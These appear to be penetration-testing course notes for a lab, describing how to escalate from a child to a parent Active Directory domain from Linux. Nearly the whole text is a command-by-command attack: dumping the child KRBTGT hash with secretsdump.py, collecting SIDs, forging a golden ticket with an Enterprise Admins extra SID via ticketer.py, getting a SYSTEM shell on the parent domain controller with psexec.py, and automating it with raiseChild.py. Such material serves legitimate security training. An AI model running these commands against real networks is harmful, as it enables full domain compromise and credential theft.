26. Attacking Domain Trusts - Child - Parent Trusts - from Linux
I. Prerequisites
To perform this attack, the following information is required:
KRBTGT hash for the child domain.
SID for the child domain.
Target user name (can be non-existent).
FQDN of the child domain.
SID of the Enterprise Admins group of the root domain.
II. Steps
1. Obtain KRBTGT hash
Use secretsdump.py from Impacket.
Command:
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt2. Obtain SID for child domain
Use lookupsid.py from Impacket.
Commands:
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240Filter to get only the Domain SID:
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"3. Obtain SID for Enterprise Admins group
Use lookupsid.py targeting the parent domain's DC.
Command:
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"4. Construct Golden Ticket
Use ticketer.py from Impacket.
Command:
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker5. Set KRB5CCNAME environment variable
Command:
export KRB5CCNAME=hacker.ccache6. Gain SYSTEM shell on parent domain DC
Use psexec.py from Impacket.
Command:
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.57. Automate with raiseChild.py
Command:
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_admIII. Important Considerations
raiseChild.pyautomates the process, but understanding the manual steps is crucial for troubleshooting.Using "autopwn" scripts in client environments requires caution.
A thorough understanding of the underlying tools is paramount.
Impacket is a powerful suite of tools that should be used responsibly.
Last updated